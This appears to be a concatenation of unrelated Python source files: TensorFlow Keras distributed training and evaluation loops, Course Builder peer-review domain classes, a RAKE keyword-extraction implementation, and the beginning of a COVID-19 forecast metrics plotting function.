before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
val_iterator: Iterator for validation data.
validation_steps: Number of steps to run validation for
(only if doing validation from data tensors).
Ignored with the default value of `None`.
Returns:
Returns `None`.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
def _per_device_fit_function(model):
model._make_fit_function()
return (model._fit_function.inputs, model._fit_function.outputs,
model._fit_function.updates_op, model._fit_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(1)
out_labels = model.metrics_names or []
def step_fn(ctx, inputs):
"""Clones the model and calls make_fit_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
inputs, targets = inputs
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=True,
inputs=inputs,
targets=targets,
mode=_Mode.TRAIN)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_fit_function, args=(model._grouped_model_train,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args)
combined_fn = K.function(
all_inputs,
all_outputs,
updates=all_updates,
name='distributed_fit_function',
**all_session_args)
for label, output in zip(out_labels, combined_fn.outputs):
if label == 'loss':
reduce_op = distribute_lib.get_loss_reduction()
else:
# We reduce all other metrics using mean for now. This is temporary
# workaround until new metrics are in place.
reduce_op = ds_reduce_util.ReduceOp.MEAN
ctx.set_last_step_output(label, output, reduce_op)
# TODO(priyag, sourabhbajaj): Ignoring these things from the combined_fn:
# feed_dict, session kwargs, run options, run_metadata for now. These should
# be handled appropriately
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name in model.metrics_names[1:]:
tensor = model._all_stateful_metrics_tensors[name]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
if steps_per_epoch is None:
raise ValueError('`steps_per_epoch` should be specified when calling '
'`fit` on the model.')
steps_per_run = K.variable(
value=min(steps_per_epoch, current_strategy.extended.steps_per_run),
dtype='int32',
name='steps_per_run')
with current_strategy.scope():
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=steps_per_run,
initial_loop_values=initial_loop_values)
train_op = ctx.run_op
output_tensors = ctx.last_step_outputs
do_validation = bool(validation_steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_train)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=do_validation,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
# Calculate the steps each time on the device.
steps_to_run = [current_strategy.extended.steps_per_run] * (
steps_per_epoch // current_strategy.extended.steps_per_run)
if steps_per_epoch % current_strategy.extended.steps_per_run:
steps_to_run.append(
steps_per_epoch % current_strategy.extended.steps_per_run)
callbacks.on_train_begin()
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
step_index = 0
prev_step_count = None
for step_count in steps_to_run:
batch_logs = {'batch': step_index, 'size': 1, 'num_steps': step_count}
callbacks.on_batch_begin(step_index, batch_logs)
if prev_step_count is None or step_count != prev_step_count:
steps_per_run.load(step_count, K.get_session())
prev_step_count = step_count
try:
_, outputs = K.get_session().run([train_op, output_tensors])
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
'batches (in this case, %d batches).' %
steps_per_epoch * epochs)
break
batch_logs.update(outputs)
callbacks.on_batch_end(step_index, batch_logs)
step_index = step_index + step_count
if callbacks.model.stop_training:
break
if do_validation:
logging.info('Running validation at fit epoch: %s', epoch)
# Since we create a new clone from the original model we need to copy
# the weights back to the original model before we can run validation.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model_train)[0].get_weights()
model.set_weights(updated_weights)
val_outs = experimental_test_loop( # pylint: disable=undefined-variable
model,
val_iterator,
steps=validation_steps,
verbose=verbose,
initialize_finalize_strategy=False)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for label, val_out in zip(out_labels, val_outs):
epoch_logs['val_' + label] = val_out
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model_train)[0].get_weights()
model.set_weights(updated_weights)
K.get_session().run(current_strategy.finalize())
return model.history
def experimental_test_loop(model,
iterator,
verbose=0,
steps=None,
initialize_finalize_strategy=True):
"""Test loop for evaluating with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
initialize_finalize_strategy: Should the strategy initialize and finalize
functions be called.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
if initialize_finalize_strategy:
K.get_session().run(current_strategy.initialize())
def _per_device_eval_function(model):
model._make_eval_function()
return (model._eval_function.inputs, model._eval_function.outputs,
model._eval_function.updates_op,
model._eval_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def step_fn(ctx, inputs):
"""Clones the model and calls make_eval_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
inputs, targets = inputs
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
targets=targets,
mode=_Mode.TEST)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_eval_function, args=(model._grouped_model_test,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
for label, output in zip(model.metrics_names, combined_fn.outputs):
if label == 'loss':
reduce_op = distribute_lib.get_loss_reduction()
else:
# We reduce all other metrics using mean for now. This is temporary
# workaround until new metrics are in place.
reduce_op = ds_reduce_util.ReduceOp.MEAN
ctx.set_last_step_output(label, output, reduce_op)
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name in model.metrics_names[1:]:
tensor = model._all_stateful_metrics_tensors[name]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag): Use steps_per_run when we use new metrics as they will
# allow handling metric computation at each step using variables.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
test_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_test)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
outs = [0.] * len(model.metrics_names)
for step in range(steps):
_, batch_outs = K.get_session().run([test_op, output_tensors])
for i, label in enumerate(model.metrics_names):
outs[i] += batch_outs[label]
if verbose >= 1:
progbar.update(step + 1)
for i in range(len(outs)):
outs[i] /= (steps)
if initialize_finalize_strategy:
K.get_session().run(current_strategy.finalize())
if len(outs) == 1:
return outs[0]
return outs
def experimental_predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
def step_fn(ctx, inputs):
"""Clones the model and calls make_predict_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_replicas(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
mode=_Mode.PREDICT)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_replica(
_per_device_predict_function, args=(model._grouped_model_predict,))
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
for label, output in zip(model.output_names, combined_fn.outputs):
ctx.set_last_step_output(label, output)
return combined_fn.updates_op
# Add initial dummy values for outputs.
initial_loop_values = {}
batch_dimension = distributed_training_utils.get_batch_dimension(iterator)
for name, tensor in zip(model.output_names, model.outputs):
# TODO(priyag): This is a workaround as we do not know the batch dimension
# of the model's output at this point.
shape = tensor_shape.TensorShape(tensor.shape.dims)
shape.dims = [batch_dimension] + shape.dims[1:]
initial_loop_values[name] = array_ops.zeros(shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Support steps_per_run if/when we add outfeed.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
predict_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model_predict)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = [[] for _ in model.outputs]
for step in range(steps):
_, batch_outs = K.get_session().run([predict_op, output_tensors])
# TODO(priyag): maybe need to unwrap the outputs first for MirroredStrategy.
for i, label in enumerate(model.output_names):
unconcatenated_outs[i].extend(batch_outs[label])
if verbose >= 1:
progbar.update(step + 1)
K.get_session().run(current_strategy.finalize())
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _clone_and_build_model(model, inputs=None, targets=None):
"""Clone and build the given keras_model."""
# We need to set the import here since we run into a circular dependency
# error.
from tensorflow.python.keras import models # pylint: disable=g-import-not-at-top
cloned_model = models.clone_model(model, input_tensors=inputs)
# Compile and build model.
if isinstance(model.optimizer, optimizers.TFOptimizer):
optimizer = model.optimizer
else:
optimizer_config = model.optimizer.get_config()
optimizer = model.optimizer.__class__.from_config(optimizer_config)
# Recast all low precision outputs back to float32 since we only casted
# the inputs to bfloat16 and not targets. This is done so that we can preserve
# precision when calculating the loss value.
def _upcast_low_precision_outputs(output):
if output.dtype == dtypes.bfloat16:
return math_ops.cast(output, dtypes.float32)
else:
return output
cloned_model.outputs = [_upcast_low_precision_outputs(o)
for o in cloned_model.outputs]
if isinstance(targets, tuple):
targets = nest.flatten(targets)
cloned_model.compile(
optimizer,
model.loss,
metrics=metrics_module.clone_metrics(model._compile_metrics),
loss_weights=model.loss_weights,
sample_weight_mode=model.sample_weight_mode,
weighted_metrics=metrics_module.clone_metrics(
model._compile_weighted_metrics),
target_tensors=targets)
return cloned_model
def clone_model_on_replicas(model, strategy, make_callback_model=False,
inputs=None, targets=None, mode=None):
"""Create a cloned model on each replica."""
with strategy.scope():
grouped_model = strategy.call_for_each_replica(
_clone_and_build_model, args=(model, inputs, targets))
if mode is _Mode.TRAIN:
model._grouped_model_train = grouped_model
elif mode is _Mode.TEST:
model._grouped_model_test = grouped_model
elif mode is _Mode.PREDICT:
model._grouped_model_predict = grouped_model
else:
model._grouped_model = grouped_model
if make_callback_model:
model._make_callback_model(grouped_model)
def _get_input_from_iterator(iterator, model):
"""Get elements from the iterator and verify the input shape and type."""
next_element = iterator.get_next()
if len(nest.flatten(next_element)) == len(model.inputs):
x = next_element
y = None
sample_weights = None
elif len(nest.flatten(next_element)) == (len(model.inputs) +
len(model.outputs)):
x, y = next_element
sample_weights = None
else:
x, y, sample_weights = next_element
# Validate that all the elements in x and y are of the same type and shape.
# We can then pass the first element of x and y to `_standardize_weights`
# below and be confident of the output.
x_values, y_values, sample_weights_values = distributed_training_utils.\
validate_distributed_dataset_inputs(model._distribution_strategy, x, y,
sample_weights)
model._standardize_weights(x_values, y_values,
sample_weight=sample_weights_values)
return x, y, sample_weights
def _get_execution_function(model, mode):
"""Get function to run one step of distributed model execution."""
strategy = model._distribution_strategy
if not model._grouped_model:
clone_model_on_replicas(
model, strategy, make_callback_model=(mode == 'train'))
def _per_device_function(model):
f = model._get_execution_function(mode)
return (f.inputs, f.outputs, f.updates_op, f.session_kwargs)
with strategy.scope():
# Create train ops on each of the devices when we call
# `_per_device_fit_function`.
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = strategy.call_for_each_replica(
_per_device_function, args=(model._grouped_model,))
if mode == 'train':
# Initialize the variables in the replicated model. This is necessary for
# multi-worker training because on some workers, initialization is not
# needed. This method does initialization or waiting for initialization
# according to the context object of distribute coordinator.
distributed_training_utils.init_restore_or_wait_for_variables()
# Unwrap all the per device values returned from `call_for_each_replica`.
# Unwrapping per device values gives you a list of values that can be
# used to construct a new train function that is composed of update ops on
# all the devices over which the model is distributed.
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
strategy,
grouped_inputs,
grouped_outputs,
grouped_updates,
grouped_session_args,
with_loss_tensor=(mode != 'predict'))
return K.function(
all_inputs,
all_outputs,
updates=all_updates,
name='distributed_{}_function'.format(mode),
**all_session_args)
def _prepare_feed_values(model, inputs, targets, sample_weights, mode):
"""Prepare feed values to the model execution function.
Arguments:
model: Model to prepare feed values for.
inputs: List or dict of model inputs.
targets: Optional list of model targets.
sample_weights: Optional list of sample weight arrays.
mode: One of 'train'/'test'/'predict'.
Returns:
Feed values for the model in the given mode.
"""
strategy = model._distribution_strategy
inputs, targets, sample_weights = _get_input_from_iterator(inputs, model)
inputs = distributed_training_utils.flatten_perdevice_values(strategy, inputs)
targets = distributed_training_utils.flatten_perdevice_values(
strategy, targets)
if mode == 'predict':
sample_weights = []
targets = []
else:
sample_weights = [
None for _ in range(len(model.outputs) * strategy.num_replicas_in_sync)
]
ins = inputs + targets + sample_weights
if mode == 'train' and not isinstance(K.learning_phase(), int):
ins += [True]
return ins
def _copy_weights_to_distributed_model(model):
"""Copies weights from original model to distributed models."""
if model._distribution_strategy:
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
distributed_model = model._distribution_strategy.unwrap(
model._grouped_model)[0]
distributed_training_utils.set_weights(
model._distribution_strategy, distributed_model, orig_model_weights)
def _copy_weights_to_original_model(model, mode):
"""Copies weights from first distributed model back to original model."""
if model._distribution_strategy and mode == 'train':
updated_weights = model._distribution_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
def _per_device_aggregate_batch(batch_outs, model, mode):
"""Aggregates the per-device batch-level outputs from a distributed step."""
if model._distribution_strategy is not None and mode == 'predict':
total_batch_outs = []
for i in range(len(model.outputs)):
num_replicas = model._distribution_strategy.num_replicas_in_sync
nested_outs = batch_outs[i * num_replicas:i * num_replicas + num_replicas]
total_batch_outs.append(np.concatenate(nest.flatten(nested_outs)))
return total_batch_outs
return batch_outs
def should_run_experimental_loop(model):
"""Whether to run the experimental loops in this file."""
return (hasattr(model, '_distribution_strategy') and
model._distribution_strategy.__class__.__name__ == 'TPUStrategy')
|
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects and constants for use by internal and external clients."""
__author__ = [
'[email protected] (John Cox)',
]
# Identifier for reviews that have been computer-assigned.
ASSIGNER_KIND_AUTO = 'AUTO'
# Identifier for reviews that have been assigned by a human.
ASSIGNER_KIND_HUMAN = 'HUMAN'
ASSIGNER_KINDS = (
ASSIGNER_KIND_AUTO,
ASSIGNER_KIND_HUMAN,
)
# Maximum number of ReviewSteps with removed = False, in any REVIEW_STATE, that
# can exist in the backend at a given time.
MAX_UNREMOVED_REVIEW_STEPS = 100
# State of a review that is currently assigned, either by a human or by machine.
REVIEW_STATE_ASSIGNED = 'ASSIGNED'
# State of a review that is complete and may be shown to the reviewee, provided
# the reviewee is themself in a state to see their reviews.
REVIEW_STATE_COMPLETED = 'COMPLETED'
# State of a review that used to be assigned but the assignment has been
# expired. Only machine-assigned reviews can be expired.
REVIEW_STATE_EXPIRED = 'EXPIRED'
REVIEW_STATES = (
REVIEW_STATE_ASSIGNED,
REVIEW_STATE_COMPLETED,
REVIEW_STATE_EXPIRED,
)
class Error(Exception):
"""Base error class."""
class ConstraintError(Error):
"""Raised when data is found indicating a constraint is violated."""
class NotAssignableError(Error):
"""Raised when review assignment is requested but cannot be satisfied."""
class RemovedError(Error):
"""Raised when an op cannot be performed on a step because it is removed."""
def __init__(self, message, value):
"""Constructs a new RemovedError."""
super(RemovedError, self).__init__(message)
self.value = value
def __str__(self):
return '%s: removed is %s' % (self.message, self.value)
class ReviewProcessAlreadyStartedError(Error):
"""Raised when someone attempts to start a review process in progress."""
class TransitionError(Error):
"""Raised when an invalid state transition is attempted."""
def __init__(self, message, before, after):
"""Constructs a new TransitionError.
Args:
message: string. Exception message.
before: string in peer.ReviewStates (though this is unenforced).
State we attempted to transition from.
after: string in peer.ReviewStates (though this is unenforced).
State we attempted to transition to.
"""
super(TransitionError, self).__init__(message)
self.after = after
self.before = before
def __str__(self):
return '%s: attempted to transition from %s to %s' % (
self.message, self.before, self.after)
class Review(object):
"""Domain object for a student work submission."""
def __init__(self, contents=None, key=None):
self._contents = contents
self._key = key
@property
def contents(self):
return self._contents
@property
def key(self):
return self._key
class ReviewStep(object):
"""Domain object for the status of a single review at a point in time."""
def __init__(
self, assigner_kind=None, change_date=None, create_date=None, key=None,
removed=None, review_key=None, review_summary_key=None,
reviewee_key=None, reviewer_key=None, state=None, submission_key=None,
unit_id=None):
self._assigner_kind = assigner_kind
self._change_date = change_date
self._create_date = create_date
self._key = key
self._removed = removed
self._review_key = review_key
self._review_summary_key = review_summary_key
self._reviewee_key = reviewee_key
self._reviewer_key = reviewer_key
self._state = state
self._submission_key = submission_key
self._unit_id = unit_id
@property
def assigner_kind(self):
return self._assigner_kind
@property
def change_date(self):
return self._change_date
@property
def create_date(self):
return self._create_date
@property
def is_assigned(self):
"""Predicate for whether the step is in REVIEW_STATE_ASSIGNED."""
return self.state == REVIEW_STATE_ASSIGNED
@property
def is_completed(self):
"""Predicate for whether the step is in REVIEW_STATE_COMPLETED."""
return self.state == REVIEW_STATE_COMPLETED
@property
def is_expired(self):
"""Predicate for whether the step is in REVIEW_STATE_EXPIRED."""
return self.state == REVIEW_STATE_EXPIRED
@property
def key(self):
return self._key
@property
def removed(self):
return self._removed
@property
def review_key(self):
return self._review_key
@property
def review_summary_key(self):
return self._review_summary_key
@property
def reviewee_key(self):
return self._reviewee_key
@property
def reviewer_key(self):
return self._reviewer_key
@property
def state(self):
return self._state
@property
def submission_key(self):
return self._submission_key
@property
def unit_id(self):
return self._unit_id
class ReviewSummary(object):
"""Domain object for review state aggregate entities."""
def __init__(
self, assigned_count=None, completed_count=None, change_date=None,
create_date=None, key=None, reviewee_key=None, submission_key=None,
unit_id=None):
self._assigned_count = assigned_count
self._completed_count = completed_count
self._change_date = change_date
self._create_date = create_date
self._key = key
self._reviewee_key = reviewee_key
self._submission_key = submission_key
self._unit_id = unit_id
@property
def assigned_count(self):
return self._assigned_count
@property
def completed_count(self):
return self._completed_count
@property
def change_date(self):
return self._change_date
@property
def create_date(self):
return self._create_date
@property
def key(self):
return self._key
@property
def reviewee_key(self):
return self._reviewee_key
@property
def submission_key(self):
return self._submission_key
@property
def unit_id(self):
return self._unit_id
class Submission(object):
"""Domain object for a student work submission."""
def __init__(self, contents=None, key=None):
self._contents = contents
self._key = key
@property
def contents(self):
return self._contents
@property
def key(self):
return self._key
|
|
# Implementation of RAKE - Rapid Automtic Keyword Exraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from indi-vidual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory.unknown: John Wiley and Sons, Ltd.
#
# NOTE: The original code (from https://github.com/aneesha/RAKE)
# has been extended by a_medelyan (zelandiya)
# with a set of heuristics to decide whether a phrase is an acceptable candidate
# as well as the ability to set frequency and phrase length parameters
# important when dealing with longer documents
from __future__ import absolute_import
from __future__ import print_function
import re
import operator
import six
from six.moves import range
debug = False
test = False
def is_number(s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def load_stop_words(stop_word_file):
"""
Utility function to load stop words from a file and return as a list of words
@param stop_word_file Path and file name of a file containing stop words.
@return list A list of stop words.
"""
stop_words = []
for line in open(stop_word_file):
if line.strip()[0:1] != "#":
for word in line.split(): # in case more than one per line
stop_words.append(word)
return stop_words
def separate_words(text, min_word_return_size):
"""
Utility function to return a list of all words that are have a length greater than a specified number of characters.
@param text The text that must be split in to words.
@param min_word_return_size The minimum no of characters a word must have to be included.
"""
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
#leave numbers in phrase, but don't count as words, since they tend to invalidate scores of their phrases
if len(current_word) > min_word_return_size and current_word != '' and not is_number(current_word):
words.append(current_word)
return words
def split_sentences(text):
"""
Utility function to return a list of sentences.
@param text The text that must be split in to sentences.
"""
sentence_delimiters = re.compile(u'[\\[\\]\n.!?,;:\t\\-\\"\\(\\)\\\'\u2019\u2013]')
sentences = sentence_delimiters.split(text)
return sentences
def build_stop_word_regex(stop_word_file_path):
stop_word_list = load_stop_words(stop_word_file_path)
stop_word_regex_list = []
for word in stop_word_list:
word_regex = '\\b' + word + '\\b'
stop_word_regex_list.append(word_regex)
stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
return stop_word_pattern
def generate_candidate_keywords(sentence_list, stopword_pattern, min_char_length=1, max_words_length=5):
phrase_list = []
for s in sentence_list:
tmp = re.sub(stopword_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "" and is_acceptable(phrase, min_char_length, max_words_length):
phrase_list.append(phrase)
return phrase_list
def is_acceptable(phrase, min_char_length, max_words_length):
# a phrase must have a min length in characters
if len(phrase) < min_char_length:
return 0
# a phrase must have a max number of words
words = phrase.split()
if len(words) > max_words_length:
return 0
digits = 0
alpha = 0
for i in range(0, len(phrase)):
if phrase[i].isdigit():
digits += 1
elif phrase[i].isalpha():
alpha += 1
# a phrase must have at least one alpha character
if alpha == 0:
return 0
# a phrase must have more alpha than digits characters
if digits > alpha:
return 0
return 1
def calculate_word_scores(phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = separate_words(phrase, 0)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
#if word_list_degree > 3: word_list_degree = 3 #exp.
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree #orig.
#word_degree[word] += 1/(word_list_length*1.0) #exp.
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
# Calculate Word scores = deg(w)/frew(w)
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0) #orig.
#word_score[item] = word_frequency[item]/(word_degree[item] * 1.0) #exp.
return word_score
def generate_candidate_keyword_scores(phrase_list, word_score, min_keyword_frequency=1):
keyword_candidates = {}
for phrase in phrase_list:
if min_keyword_frequency > 1:
if phrase_list.count(phrase) < min_keyword_frequency:
continue
keyword_candidates.setdefault(phrase, 0)
word_list = separate_words(phrase, 0)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
class Rake(object):
def __init__(self, stop_words_path, min_char_length=1, max_words_length=5, min_keyword_frequency=1):
self.__stop_words_path = stop_words_path
self.__stop_words_pattern = build_stop_word_regex(stop_words_path)
self.__min_char_length = min_char_length
self.__max_words_length = max_words_length
self.__min_keyword_frequency = min_keyword_frequency
def run(self, text):
sentence_list = split_sentences(text)
phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern, self.__min_char_length, self.__max_words_length)
word_scores = calculate_word_scores(phrase_list)
keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores, self.__min_keyword_frequency)
sorted_keywords = sorted(six.iteritems(keyword_candidates), key=operator.itemgetter(1), reverse=True)
return sorted_keywords
if test:
text = "Compatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types of systems and systems of mixed types."
# Split text into sentences
sentenceList = split_sentences(text)
#stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
stoppath = "RAKE/SmartStoplist.txt" #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
stopwordpattern = build_stop_word_regex(stoppath)
# generate candidate keywords
phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
# calculate individual word scores
wordscores = calculate_word_scores(phraseList)
# generate candidate keyword scores
keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
if debug: print(keywordcandidates)
sortedKeywords = sorted(six.iteritems(keywordcandidates), key=operator.itemgetter(1), reverse=True)
if debug: print(sortedKeywords)
totalKeywords = len(sortedKeywords)
if debug: print(totalKeywords)
print(sortedKeywords[0:(totalKeywords // 3)])
rake = Rake("SmartStoplist.txt")
keywords = rake.run(text)
print(keywords)
|
|
# pylint: disable=g-bad-file-header
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utilities for plotting metrics."""
import pathlib
from typing import Any, List, Sequence
from absl import logging
from dm_c19_modelling.evaluation import base_indexing
from dm_c19_modelling.evaluation import constants
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt # pylint: disable=g-import-not-at-top
import numpy as np
import pandas as pd
def plot_metrics(metrics_df: pd.DataFrame, target_name: str,
last_observation_date: str, eval_dataset_creation_date: str,
forecast_horizon: int,
forecast_index_entries: Sequence[base_indexing.IndexEntryType],
num_dates: int, num_sites: int, cadence: int,
dropped_sites: np.ndarray) -> plt.Figure:
"""Plots metrics dataframe as a series of bar charts.
Args:
metrics_df: Dataframe of metrics, with columns [forecast_id, metric_name,
metric_value, target_name].
target_name: the target being predicted.
last_observation_date: the last date in the training data.
eval_dataset_creation_date: the creation date of the dataset used for
evaluation.
forecast_horizon: the number of days into the future that the forecasts
extend to.
forecast_index_entries: the entries in the forecast index for each of the
forecasts that are included in the metrics dataframe.
num_dates: the number of dates included in this evaluation.
num_sites: the number of sites included in this evaluation.
cadence: the cadence of the forecasts i.e. a cadence of 1 corresponds to
daily forecasts, a cadence of 7 corresponds to weekly forecasts.
dropped_sites: optional list of sites that were dropped during evaluation
from at least one forecast to ensure that all forecasts are for the same
sites.
Returns:
A series of bar plots, one for each metric calculated in the dataframe,
evaluating different forecasts against each other.
"""
fig = plt.figure(figsize=(4, 3))
plot_width = 2
offset = 0
column_width = 0.8
axes = []
metric_names = metrics_df.metric_name.unique()
for _ in metric_names:
ax = fig.add_axes([offset, 0.1, plot_width, 1.])
ax.grid(axis="y", alpha=0.3, which="both", zorder=0)
axes.append(ax)
offset += plot_width * 1.2
colour_map = plt.get_cmap("tab20c")(
np.linspace(0, 1.0, len(forecast_index_entries)))
x_centers = np.arange(len(forecast_index_entries))
for ax_idx, metric_name in enumerate(metric_names):
x_offset = ax_idx * column_width - plot_width / 2 + column_width / 2
x_values = x_centers + x_offset
